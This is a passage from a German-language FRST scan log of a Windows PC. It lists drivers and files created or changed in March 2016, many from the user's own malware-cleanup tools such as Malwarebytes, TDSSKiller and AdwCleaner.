C:\Windows\system32\DRIVERS\RtsPer.sys [455240 2013-03-05] (RTS Corporation) S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44560 2015-07-07] (Microsoft Corporation) R0 WdFilter; C:\Windows\System32\drivers\WdFilter.sys [270168 2015-07-07] (Microsoft Corporation) R2 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114520 2015-07-07] (Microsoft Corporation) ==================== NetSvcs (Nicht auf der Ausnahmeliste) =================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) ==================== Ein Monat: Erstellte Dateien und Ordner ======== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.) 2016-03-30 14:42 - 2016-03-30 14:43 - 00015262 _____ C:\Users\Denny\Desktop\FRST.txt 2016-03-30 14:03 - 2016-03-30 14:03 - 00000000 ____D C:\Users\Denny\AppData\Local\VirtualStore 2016-03-30 13:51 - 2016-03-30 12:59 - 00024064 _____ C:\WINDOWS\zoek-delete.exe 2016-03-30 12:59 - 2016-03-30 13:44 - 00000000 ____D C:\zoek_backup 2016-03-30 12:59 - 2016-03-30 12:59 - 01309184 _____ C:\Users\Denny\Downloads\zoek.exe 2016-03-30 12:48 - 2016-03-30 12:48 - 00000749 _____ C:\Users\Denny\Desktop\Revo Uninstaller.lnk 2016-03-30 12:48 - 2016-03-30 12:48 - 00000000 ____D C:\Users\Denny\Desktop\Revo Uninstaller 2016-03-30 12:48 - 2016-03-30 12:48 - 00000000 ____D C:\Users\Denny\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Revo Uninstaller 2016-03-30 12:45 - 2016-03-30 12:45 - 02623656 _____ (VS Revo Group Ltd.) C:\Users\Denny\Downloads\revosetup95.exe 2016-03-29 19:15 - 2016-03-29 19:35 - 00197204 _____ C:\TDSSKiller.3.1.0.9_29.03.2016_19.15.23_log.txt 2016-03-29 18:17 - 2016-03-29 18:18 - 03102208 _____ C:\Users\Denny\Desktop\AdwCleaner_5.107.exe 2016-03-29 16:48 - 2016-03-30 13:54 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys 2016-03-29 16:48 - 2016-03-29 18:20 - 00001072 _____ C:\Users\Public\Desktop\ Malwarebytes Anti-Malware .lnk 2016-03-29 16:48 - 2016-03-29 16:48 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ Malwarebytes Anti-Malware 2016-03-29 16:48 - 2016-03-29 16:48 - 00000000 ____D C:\ProgramData\Malwarebytes 2016-03-29 16:48 - 2016-03-29 16:48 - 00000000 ____D C:\Program Files (x86)\ Malwarebytes Anti-Malware 2016-03-29 16:48 - 2016-03-10 14:09 - 00065408 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mwac.sys 2016-03-29 16:48 - 2016-03-10 14:08 - 00140672 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys 2016-03-29 16:48 - 2016-03-10 14:08 - 00027008 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys 2016-03-29 16:43 - 2016-03-29 16:47 - 22851472 _____ (Malwarebytes ) C:\Users\Denny\Downloads\mbam-setup-2.2.1.1043.exe 2016-03-29 12:52 - 2016-03-29 13:00 - 00231358 _____ C:\TDSSKiller.3.1.0.9_29.03.2016_12.52.00_log.txt 2016-03-29 12:50 - 2016-03-29 12:51 - 00008896 _____ C:\TDSSKiller.3.1.0.9_29.03.2016_12.50.27_log.txt 2016-03-29 12:49 - 2016-03-29 12:50 - 04727984 _____ (Kaspersky Lab ZAO) C:\Users\Denny\Desktop\tdsskiller.exe 2016-03-29 12:45 - 2016-03-29 12:45 - 00000144 _____ C:\WINDOWS\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat 2016-03-28 23:46 - 2016-03-30 12:47 - 00000000 ____D C:\Users\Denny\Desktop\Infos 2016-03-28 23:36 - 2016-03-28 23:37 - 00031180 _____ C:\Users\Denny\Downloads\Addition.txt 2016-03-28 23:34 - 2016-03-30 14:42 - 00000000 ____D C:\FRST 2016-03-28 23:34 - 2016-03-28 23:37 - 00051376 _____ C:\Users\Denny\Downloads\FRST.txt 2016-03-28 23:33 - 2016-03-28 23:33 - 02374144 _____ (Farbar) C:\Users\Denny\Desktop\FRST64.exe 2016-03-28 23:32 - 2016-03-28 23:32 - 01725440 _____ (Farbar) C:\Users\Denny\Downloads\FRST.exe 2016-03-28 23:18 - 2016-03-28 23:28 - 00003594 _____ C:\WINDOWS\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-1569062512-718196537-2772323438-500 2016-03-28 23:18 - 2016-03-28 23:18 - 00000000 ____D C:\Users\Administrator.Schneider\AppData\Roaming\Avira 2016-03-28 23:10 - 2016-03-28 23:24 - 00000000 ____D C:\Users\Administrator.Schneider\AppData\Local\Packages 2016-03-28 23:10 - 2016-03-28 23:10 - 00001454 _____ C:\Users\Administrator.Schneider\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk 2016-03-28 23:10 - 2016-03-28 23:10 - 00000020 ___SH C:\Users\Administrator.Schneider\ntuser.ini 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Vorlagen 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Startmenü 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Netzwerkumgebung 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Lokale Einstellungen 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Eigene Dateien 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Druckumgebung 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Documents\Eigene Videos 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Documents\Eigene Musik 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Documents\Eigene Bilder 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\AppData\Roaming\Microsoft\Windows\Start Menu\Programme 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\AppData\Local\Verlauf 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\AppData\Local\Anwendungsdaten 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Anwendungsdaten 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 __SHD C:\Users\Administrator\IntelGraphicsProfiles 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 ____D C:\Users\Administrator.Schneider\AppData\Roaming\Adobe 2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 ____D C:\Users\Administrator.Schneider 2016-03-28 23:10 - 2014-03-29 08:08 - 00000000 ____D C:\Users\Administrator.Schneider\AppData\Roaming\Macromedia 2016-03-28 23:10 - 2014-02-22 06:37 - 00000369 _____ C:\Users\Administrator.Schneider\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Pictures.lnk 2016-03-28 23:10 - 2014-02-22 06:37 - 00000369 _____ C:\Users\Administrator.Schneider\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Documents.lnk 2016-03-22 02:54 - 2016-03-22 02:54 - 01610352 _____ (Malwarebytes) C:\Users\Denny\Downloads\JRT.exe 2016-03-22 00:31 - 2016-03-22 00:31 - 01474568 _____ C:\Users\Denny\Downloads\BitDefender Adware Removal Tool - CHIP-Installer.exe 2016-03-22 00:21 - 2016-03-29 18:20 - 00001123 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk 2016-03-22 00:21 - 2016-03-29 18:20 - 00001117 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk 2016-03-22 00:21 - 2016-03-22 00:21 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service 2016-03-21 23:58 - 2016-03-21 23:58 - 00242376 _____ C:\Users\Denny\Downloads\Firefox Setup Stub 45.0.1.exe 2016-03-21 23:26 - 2016-02-20 17:45 - 01373184 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll 2016-03-21 23:26 - 2016-02-20 17:45 - 01168896 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll 2016-03-21 23:26 - 2016-02-20 17:45 - 00696832 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll 2016-03-21 23:26 - 2016-02-20 17:45 - 00689152 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll 2016-03-21 23:26 - 2016-02-20 17:45 - 00499200 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll 2016-03-21 23:26 - 2016-02-20 17:45 - 00076800 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll 2016-03-21 23:26 - 2016-02-05 21:06 - 00046768 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe 2016-03-21 23:26 - 2016-01-24 20:19 - 00419160 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\spaceport.sys 2016-03-21 23:26 - 2016-01-24 20:19 - 00378712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storport.sys 2016-03-21 23:26 - 2016-01-24 20:19 - 00331608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\Classpnp.sys 2016-03-21 23:26 - 2016-01-24 13:57 - 01335296 _____ (Microsoft Corporation) C:\WINDOWS\system32\mispace.dll 2016-03-21 23:26 - 2016-01-24 13:45 - 01063424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mispace.dll 2016-03-21 23:26 - 2016-01-09 03:38 - 00091992 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\usbehci.sys 2016-03-21 23:26 - 2016-01-06 20:25 - 00416768 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv.sys 2016-03-21 23:26 - 2015-12-30 23:53 - 02017624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys 2016-03-21 23:23 - 2016-02-06 18:58 - 00987648 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll 2016-03-21 23:23 - 2016-02-06 18:32 - 00801792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll 2016-03-21 23:23 - 2016-01-10 18:41 - 01707008 _____ (Microsoft Corporation) C:\WINDOWS\system32\comsvcs.dll 2016-03-21 23:23 - 2016-01-10 18:31 - 01344512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comsvcs.dll 2016-03-21 23:23 - 2016-01-09 03:49 - 00218448 _____ (Microsoft Corporation) C:\WINDOWS\system32\rsaenh.dll 2016-03-21 23:23 - 2016-01-09 03:49 - 00192120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rsaenh.dll 2016-03-21 23:23 - 2016-01-07 01:46 - 00148752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wscapi.dll 2016-03-21 23:23 - 2016-01-07 01:45 - 00177712 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscapi.dll 2016-03-21 23:23 - 2016-01-06 18:47 - 00146944 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscsvc.dll 2016-03-21 23:23 - 2015-12-30 22:49 - 00470360 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\netio.sys 2016-03-21 23:23 - 2015-12-20 16:57 - 00839168 _____ (Microsoft Corporation) C:\WINDOWS\system32\netlogon.dll 2016-03-21 23:23 - 2015-12-20 16:43 - 00696320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netlogon.dll 2016-03-21 23:23 - 2015-11-19 16:33 - 00994760 _____ (Microsoft Corporation) C:\WINDOWS\system32\ucrtbase.dll 2016-03-21 23:23 - 2015-11-19 16:26 - 00922432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ucrtbase.dll 2016-03-21 22:54 - 2016-03-29 18:39 - 00000000 ____D C:\AdwCleaner 2016-03-21 22:27 - 2016-03-21 22:36 - 00000000 ____D C:\Users\Denny\Desktop\Pferd 2016-03-21 18:50 - 2016-03-21 18:50 - 600300950 _____ C:\WINDOWS\MEMORY.DMP 2016-03-21 18:50 - 2016-03-21 18:50 - 00284928 _____ C:\WINDOWS\Minidump\032116-30421-01.dmp 2016-03-21 18:44 - 2016-01-15 18:56 - 02487296 _____ (Microsoft Corporation) C:\WINDOWS\system32\storagewmi.dll 2016-03-21 18:44 - 2016-01-15 18:45 - 01482240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\storagewmi.dll 2016-03-21 18:44 - 2016-01-05 17:00 - 00570880 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe 2016-03-21 18:44 - 2015-12-20 16:56 - 00616960 _____ (Microsoft Corporation) C:\WINDOWS\system32\msra.exe 2016-03-21 18:37 - 2016-03-29 18:20 - 00001192 _____ C:\Users\Public\Desktop\Avira Antivirus.lnk 2016-03-21 18:37 - 2016-03-21 18:37 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avira 2016-03-21 18:15 - 2016-03-21 18:15 - 00000000 ____D C:\Users\Denny\AppData\Local\app 2016-03-21 18:14 - 2016-03-21 18:43 - 00000000 ____D C:\Users\Denny\AppData\Roaming\Avira 2016-03-21 18:07 - 2016-03-21 18:35 - 00000000 ____D C:\ProgramData\Avira 2016-03-21 18:07 - 2016-03-21 18:34 - 00137952 _____ (Avira Operations GmbH & Co. KG) C:\WINDOWS\system32\Drivers\avipbb.sys 2016-03-21 18:07 - 2016-03-21 18:34 - 00128664 _____ (Avira Operations GmbH & Co. KG) C:\WINDOWS\system32\Drivers\avgntflt.sys 2016-03-21 18:07 - 2016-03-21 18:34 - 00068936 _____ (Avira Operations GmbH & Co. KG) C:\WINDOWS\system32\Drivers\avnetflt.sys 2016-03-21 18:07 - 2016-03-21 18:34 - 00035488 _____ (Avira Operations GmbH & Co. KG) C:\WINDOWS\system32\Drivers\avkmgr.sys 2016-03-21 18:07 - 2016-03-21 18:07 - 00000000 ____D C:\Program Files (x86)\Avira 2016-03-21 17:38 - 2016-03-08 09:00 - 00829944 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe 2016-03-21 17:38 - 2016-03-08 09:00 - 00176632 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl 2016-03-21 16:28 - 2016-02-12 21:14 - 00136904 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuauclt.exe 2016-03-21 16:28 - 2016-02-12 17:14 - 03708416 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll 2016-03-21 16:28 - 2016-02-12 16:55 - 00409088 _____ (Microsoft Corporation) C:\WINDOWS\system32\WUSettingsProvider.dll 2016-03-21 16:28 - 2016-02-12 16:54 - 00140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuwebv.dll 2016-03-21 16:28 - 2016-02-12 16:54 - 00095744 _____ (Microsoft Corporation) C:\WINDOWS\system32\wudriver.dll 2016-03-21 16:28 - 2016-02-12 16:54 - 00035840 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapp.exe 2016-03-21 16:28 - 2016-02-12 16:51 - 00124928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuwebv.dll 2016-03-21 16:28 - 2016-02-12 16:51 - 00081920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wudriver.dll 2016-03-21 16:28 - 2016-02-12 16:51 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapp.exe 2016-03-21 16:28 - 2016-02-12 16:48 - 02244096 _____ (Microsoft Corporation) C:\WINDOWS\system32\wucltux.dll 2016-03-21 16:28 - 2016-02-12 16:47 - 00897024 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll 2016-03-21 16:28 - 2016-02-12 16:46 - 00726528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll 2016-03-21 16:24 - 2016-02-08 23:05 - 20352512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll 2016-03-21 16:24 - 2016-02-08 22:34 - 02280448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll 2016-03-21 16:24 - 2016-02-08 22:29 - 00099328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hlink.dll 2016-03-21 16:24 - 2016-02-08 22:10 - 04611072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll 2016-03-21 16:24 - 2016-02-08 22:05 - 25816576 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll 2016-03-21 16:24 - 2016-02-08 22:03 - 00230400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webcheck.dll 2016-03-21 16:24 - 2016-02-08 22:02 - 13012480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll 2016-03-21 16:24 - 2016-02-08 22:02 - 00687104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll 2016-03-21 16:24 - 2016-02-08 22:01 - 02050560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl 2016-03-21 16:24 - 2016-02-08 21:43 - 02121216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll 2016-03-21 16:24 - 2016-02-08 20:27 - 02887680 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll 2016-03-21 16:24 - 2016-02-08 20:26 - 00571904 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll 2016-03-21 16:24 - 2016-02-08 20:16 - 06052352 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll 2016-03-21 16:24 - 2016-02-08 20:14 - 00108544 _____ (Microsoft Corporation) C:\WINDOWS\system32\hlink.dll 2016-03-21 16:24 - 2016-02-08 20:13 - 00817664 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript.dll 2016-03-21 16:24 - 2016-02-08 19:42 - 01032704 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcomm.dll 2016-03-21 16:24 - 2016-02-08 19:37 - 00262144 _____ (Microsoft Corporation) C:\WINDOWS\system32\webcheck.dll 2016-03-21 16:24 - 2016-02-08 19:34 - 00798720 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll 2016-03-21 16:24 - 2016-02-08 19:33 - 14613504 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll 2016-03-21 16:24 - 2016-02-08 19:33 - 02123264 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl 2016-03-21 16:24 - 2016-02-08 19:19 - 02597376 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll 2016-03-21 16:24 - 2016-02-08 19:15 - 02880000 _____ (Microsoft Corporation) C:\WINDOWS\system32\actxprxy.dll 2016-03-21 16:24 - 2016-02-08 19:07 - 01546752 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll 2016-03-21 16:24 - 2016-02-08 18:55 - 00800768 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll 2016-03-21 16:23 - 2016-02-08 22:39 - 00496640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll 2016-03-21 16:23 - 2016-02-08 22:28 - 00663552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript.dll 2016-03-21 16:23 - 2016-02-08 22:07 - 00880128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcomm.dll 2016-03-21 16:23 - 2016-02-08 21:39 - 01311744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll 2016-03-21 16:23 - 2016-02-08 21:38 - 00710144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll 2016-03-21 16:23 - 2016-02-08 19:51 - 00092160 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll 2016-03-21 16:19 - 2016-02-11 16:21 - 00869576 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvcr120_clr0400.dll 2016-03-21 16:19 - 2016-02-11 16:21 - 00678600 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvcp120_clr0400.dll 2016-03-21 16:19 - 2016-02-11 16:20 - 00875720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvcr120_clr0400.dll 2016-03-21 16:19 - 2016-02-11 16:20 - 00536776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvcp120_clr0400.dll 2016-03-21 16:19 - 2016-02-05 16:59 - 07784960 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll 2016-03-21 16:19 - 2016-02-05 16:55 - 05264384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll 2016-03-21 16:19 - 2016-02-05 16:48 - 07075840 _____ (Microsoft Corporation) C:\WINDOWS\system32\glcndFilter.dll 2016-03-21 16:19 - 2016-02-05 16:47 - 05268480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\glcndFilter.dll 2016-03-21 16:18 - 2016-02-03 22:37 - 01661576 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll 2016-03-21 16:18 - 2016-02-03 22:36 - 01212248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll 2016-03-21 16:18 - 2016-02-03 17:09 - 00086016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll 2016-03-21 16:18 - 2016-02-03 17:00 - 00091136 _____ (Microsoft Corporation) C:\WINDOWS\system32\asycfilt.dll 2016-03-21 16:18 - 2016-02-03 17:00 - 00077824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\asycfilt.dll 2016-03-21 16:13 - 2016-02-06 20:08 - 00031744 _____ (Microsoft Corporation) C:\WINDOWS\system32\seclogon.dll 2016-03-21 16:13 - 2016-02-05 21:07 - 00292696 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMASF.DLL 2016-03-21 16:13 - 2016-02-05 21:07 - 00243032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMASF.DLL 2016-03-21 16:13 - 2016-02-05 17:03 - 15432704 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmp.dll 2016-03-21 16:13 - 2016-02-05 17:00 - 13318144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmp.dll 2016-03-21 16:13 - 2016-02-04 20:18 - 04174336 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32k.sys 2016-03-21 16:13 - 2016-02-04 20:18 - 00358912 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\atmfd.dll 2016-03-21 16:13 - 2016-02-04 20:12 - 00044032 _____ (Adobe Systems) C:\WINDOWS\system32\atmlib.dll 2016-03-21 16:13 - 2016-02-04 19:44 - 00301568 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\atmfd.dll 2016-03-21 16:13 - 2016-02-04 19:39 - 00035840 _____ (Adobe Systems) C:\WINDOWS\SysWOW64\atmlib.dll 2016-03-21 16:13 - 2016-02-04 19:24 - 00603648 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfds.dll 2016-03-21 16:13 - 2016-02-04 19:02 - 00483328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfds.dll 2016-03-21 16:13 - 2016-01-31 21:16 - 00148832 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBSTOR.SYS 2016-03-08 14:19 - 2016-03-21 15:58 - 00000000 ____D C:\Users\Denny\Desktop\bewerbung philipp 2016-03-08 14:00 - 2016-03-08 14:00 - 00137615 _____ C:\Users\Denny\Desktop\EPSON002.png.PDF 2016-03-08 13:19 - 2016-03-08 13:19 - 05404312 _____ (Avira Operations GmbH & Co. KG) C:\Users\Denny\Downloads\avira_de_av_56deb4d03eff9__ws.exe 2016-03-08 12:16 - 2016-03-08 12:16 - 00000000 ____D C:\Program Files (x86)\DATA BECKER 2016-03-08 12:16 - 1998-11-17 14:44 - 00328704 _____ (InstallShield Software Corporation ) C:\WINDOWS\IsUn0407.exe 2016-03-08 12:13 - 2016-03-08 12:13 - 01470472 _____ C:\Users\Denny\Downloads\PopUp Banner Blocker - CHIP-Installer.exe 2016-03-08 11:46 - 2016-03-08 11:59 - 05600464 _____ (Piriform Ltd) C:\Users\Denny\Downloads\ccsetup515_slim(1).exe 2016-03-08 11:44 - 2016-03-08 11:46 - 05600464 _____ (Piriform Ltd) C:\Users\Denny\Downloads\ccsetup515_slim.exe 2016-03-05 22:21 - 2016-03-05 22:21 - 00003728 _____ C:\WINDOWS\System32\Tasks\{55AB0601-0B56-F46D-28BD-EBA44DF6A920} ==================== Ein Monat: Geänderte Dateien und Ordner ======== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.) 2016-03-30 14:04 - 2016-02-05 00:38 - 00000884 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job 2016-03-30 14:03 - 2015-11-01 22:59 - 00003598 _____ C:\WINDOWS\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-1569062512-718196537-2772323438-1001 2016-03-30 13:57 - 2013-09-30 06:14 - 01776918 _____ C:\WINDOWS\system32\PerfStringBackup.INI 2016-03-30 13:57 - 2013-09-30 05:56 - 00765582 _____ C:\WINDOWS\system32\perfh007.dat 2016-03-30 13:57 - 2013-09-30 05:56 - 00159366 _____ C:\WINDOWS\system32\perfc007.dat 2016-03-30 13:57 - 2013-08-22 15:36 - 00000000 ____D C:\WINDOWS\Inf 2016-03-30 13:54 - 2013-10-24 13:02 - 00000000 __RDO C:\Users\Denny\SkyDrive 2016-03-30 13:52 - 2013-08-22 16:45 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT 2016-03-30 13:47 - 2016-01-28 22:26 - 00000000 ____D C:\Users\Denny\AppData\Local\Google 2016-03-30 13:47 - 2014-07-31 22:27 - 00000000 ____D C:\Users\HomeGroupUser$\AppData\Local\Google 2016-03-30 13:47 - 2014-07-31 22:27 - 00000000 ____D C:\Users\HomeGroupUser$\AppData\Local\Comodo 2016-03-30 13:47 - 2014-07-31 22:27 - 00000000 ____D C:\Users\Gast\AppData\Local\Google 2016-03-30 13:47 - 2014-07-31 22:27 - 00000000 ____D C:\Users\Gast\AppData\Local\Comodo 2016-03-30 13:47 - 2014-07-31 22:27 - 00000000 ____D C:\Users\Administrator\AppData\Local\Google 2016-03-30 13:47 - 2014-07-31 22:27 - 00000000 ____D C:\Users\Administrator\AppData\Local\Comodo 2016-03-30 12:54 - 2013-09-09 15:29 - 00000000 ____D C:\Program Files (x86)\Google 2016-03-29 18:44 - 2013-10-13 12:41 - 00001921 _____ C:\Users\Denny\Desktop\SonyEditor.lnk 2016-03-29 18:41 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\Globalization 2016-03-29 18:41 - 2013-08-22 15:25 - 00524288 ___SH C:\WINDOWS\system32\config\BBI 2016-03-29 18:20 - 2014-12-24 23:20 - 00001058 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Photoshop Elements 13.lnk 2016-03-29 18:20 - 2014-12-24 23:20 - 00001052 _____ C:\Users\Public\Desktop\Adobe Photoshop Elements 13.lnk 2016-03-29 18:20 - 2014-07-11 21:30 - 00001321 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Creative Cloud.lnk 2016-03-29 18:20 - 2014-07-11 21:30 - 00001315 _____ C:\Users\Public\Desktop\Adobe Creative Cloud.lnk 2016-03-29 18:20 - 2014-05-19 22:09 - 00002213 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Amazon.lnk 2016-03-29 18:20 - 2014-03-29 08:08 - 00001047 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Download Assistant.lnk 2016-03-29 18:20 - 2013-12-07 10:06 - 00001110 _____ C:\Users\Public\Desktop\Acer Portal.lnk 2016-03-29 18:20 - 2013-11-10 21:21 - 00001178 _____ C:\Users\Public\Desktop\Acer Remote Files.lnk 2016-03-29 18:20 - 2013-11-10 21:20 - 00001140 _____ C:\Users\Public\Desktop\Acer Docs.lnk 2016-03-29 18:20 - 2013-10-24 12:44 - 00001535 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk 2016-03-29 18:20 - 2013-09-07 22:32 - 00000928 _____ C:\Users\Public\Desktop\EPSON Scan.lnk 2016-03-29 18:19 - 2016-02-19 13:56 - 00001454 _____ C:\Users\Denny\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk 2016-03-29 18:17 - 2014-05-16 21:31 - 00000000 ____D C:\temp 2016-03-29 18:11 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\rescache 2016-03-29 12:51 - 2012-07-26 09:59 - 00000000 ____D C:\WINDOWS\CbsTemp 2016-03-29 12:48 - 2015-08-11 08:03 - 00000000 ___SD C:\WINDOWS\SysWOW64\GWX 2016-03-29 12:48 - 2015-08-11 08:03 - 00000000 ___SD C:\WINDOWS\system32\GWX 2016-03-28 23:29 - 2013-08-22 17:36 - 00000000 ____D 